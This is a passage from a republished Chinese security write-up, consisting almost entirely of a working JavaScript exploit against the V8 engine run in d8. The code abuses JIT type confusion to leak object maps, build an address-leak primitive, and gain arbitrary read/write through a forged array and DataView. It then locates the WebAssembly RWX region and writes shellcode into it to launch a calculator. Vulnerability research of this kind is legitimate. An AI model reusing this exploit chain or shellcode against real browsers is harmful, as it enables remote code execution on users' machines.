10000;i++){ tmp = get_map_opt('test'); } double_map = tmp[0]; element_map =Add(Int64.fromDouble(double_map), 0xa0).asDouble(); global_var.push(tmp[1]); global_var.push(tmp[2]); } get_map(); console.log("double_map:",Int64.fromDouble(double_map)); console.log("element_map:",Int64.fromDouble(element_map)); function get_array_map_opt(x){ let a = Array(2); a[0] = 1.1; a[1] = 1.2; let b = {a0:1.1 , a1:1.1 , a2:1.1 , a3:1.1 , a4:1.1 , a5:1.1 , a6:1.1 , a7:1.1 , a8:1.1 , a9:1.1 , a10:1.1 , a11:1.1 , a12:1.1 , a13:1.1 , a14:1.1 , a15:1.1 , a16:1.1 , a17:1.1 , a18:1.1 , a19:1.1 , a20:1.1 , a21:1.1 , a22:1.1 , a23:1.1 , a24:1.1 , a25:1.1 , a26:1.1 , a27:1.1 , a28:1.1 , a29:1.1}; let index = 0; if(x = 'p4nda'){index = 2;} return [a[index],b]; } function get_array_map(){ for(var i = 0; i< 10000; i++){ var tmp = get_array_map_opt(); } array_map = tmp[0]; global_tmp.push(tmp[1]); //%DebugPrint(tmp[1]); } get_array_map(); console.log("array_map",Int64.fromDouble(array_map)); function prepare_double_map_opt(x){ let arr = [double_map,double_map,double_map,double_map]; let index = 0; if(x = 'p4nda'){index = 4;} arr[index] = element_map; return arr; } function prepare_double_map(){ var tmp; for (var i = 0; i< 10000;i++){ tmp = prepare_double_map_opt(); } return tmp[1]; } double_map_obj = prepare_double_map(); function addrof_opt(obj){ var a = [obj, obj, obj, obj]; let index = 0; if(x = 'p4nda'){index = 4}; a[index] = double_map_obj; return a; } function addrof(obj){ for(var i = 0;i<100000;i++){ var a = addrof_opt(obj); } return a[0]; } f_obj_addr = Int64.fromDouble(addrof(f)) console.log("address of function obj:",f_obj_addr); //%DebugPrint(f); function get_victim_obj_opt(x){ let b = [11.1,1.1]; let index = 0; if (x = 'p4nda'){index = 2;} b[index] = array_map; console.log(b.length); return b; } function get_victim_obj(){ for (var i = 0 ; i < 10000; i++){ var tmp = get_victim_obj_opt(); } victim_arraybuffer = new ArrayBuffer(0x100); victim_jsarray = tmp; } get_victim_obj(); //%DebugPrint(victim_jsarray); //%DebugPrint(victim_arraybuffer); console.log(Int64.fromDouble(victim_jsarray.a5)); victim_jsarray.a5 = f_obj_addr.asDouble(); let dv = new DataView(victim_arraybuffer); SharedFunctionInfo_addr = Int64.fromDouble(dv.getFloat64(0x17,true)); console.log("[+] SharedFunctionInfo addr :"+SharedFunctionInfo_addr); victim_jsarray.a5 = SharedFunctionInfo_addr.asDouble(); WasmExportedFunctionData_addr = Int64.fromDouble(dv.getFloat64(0x7,true)); console.log("[+] WasmExportedFunctionData addr :"+WasmExportedFunctionData_addr); //let tmp = addrof(f); victim_jsarray.a5 = WasmExportedFunctionData_addr.asDouble(); WasmInstanceObject_addr = Int64.fromDouble(dv.getFloat64(0xf,true)); console.log("[+] WasmInstanceObject addr :"+WasmInstanceObject_addr); victim_jsarray.a5 = WasmInstanceObject_addr.asDouble(); imported_function_targets_addr = Int64.fromDouble(dv.getFloat64(0x3f,true)); console.log("[+] imported_function_targets addr :"+imported_function_targets_addr); victim_jsarray.a5 = imported_function_targets_addr.asDouble(); rwx_area = Int64.fromDouble(dv.getFloat64(0,true)); console.log("[+] rwx_area addr :"+rwx_area); victim_jsarray.a5 = rwx_area.asDouble(); let shellcode_calc = [72, 49, 201, 72, 129, 233, 247, 255, 255, 255, 72, 141, 5, 239, 255, 255, 255, 72, 187, 124, 199, 145, 218, 201, 186, 175, 93, 72, 49, 88, 39, 72, 45, 248, 255, 255, 255, 226, 244, 22, 252, 201, 67, 129, 1, 128, 63, 21, 169, 190, 169, 161, 186, 252, 21, 245, 32, 249, 247, 170, 186, 175, 21, 245, 33, 195, 50, 211, 186, 175, 93, 25, 191, 225, 181, 187, 206, 143, 25, 53, 148, 193, 150, 136, 227, 146, 103, 76, 233, 161, 225, 177, 217, 206, 49, 31, 199, 199, 141, 129, 51, 73, 82, 121, 199, 145, 218, 201, 186, 175, 93]; let write_tmp = new Uint8Array(victim_arraybuffer); write_tmp.set(shellcode_calc); console.log("[+] Enter to pop up a calc ... "); readline(); f(); } exploit();
由于chromium编译太慢了,用d8代替结果:
文章来源: http://xz.aliyun.com/t/5870
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh